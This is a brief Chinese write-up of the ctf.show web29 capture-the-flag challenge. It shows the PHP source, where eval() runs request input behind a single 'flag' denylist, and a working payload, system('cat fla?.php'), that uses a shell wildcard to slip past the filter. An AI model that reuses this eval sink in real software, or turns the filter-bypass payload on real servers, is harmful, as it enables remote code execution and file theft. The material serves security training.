web29

代码审计嘛

<?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 00:26:48

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/

// ctf.show web29 challenge source: an intentionally vulnerable eval()
// sink guarded only by a case-insensitive denylist on the token "flag".

// Suppresses every warning/notice, so a failing eval() leaves no trace
// in the response; on a real deployment this also blinds the error log
// to what went through the sink.
error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    // Denylist check: rejects only inputs containing the substring
    // "flag" (any case). It places no restriction on which PHP
    // functions the input may call, so a single-token denylist is not
    // a sandbox — the only real mitigation is to never pass request
    // data to eval() at all.
    if(!preg_match("/flag/i", $c)){

        // Arbitrary-code-execution sink: the GET parameter is executed
        // as PHP inside the web server's PHP process.
        eval($c);

    }

    

}else{

    // No parameter: print this file's own source (the challenge is a
    // code-audit task, so the source is deliberately exposed).
    highlight_file(__FILE__);

}

就过滤了一个flag,简单

payload:

http://7739c9b6-32d1-4535-b359-a1e191234215.challenge.ctf.show/?c=system('cat fla?.php');
// 这里涉及的知识点是bash的通配符,问号 ? 代表一个任意字符,星号 * 代表任意数量个任意字符

flag在注释里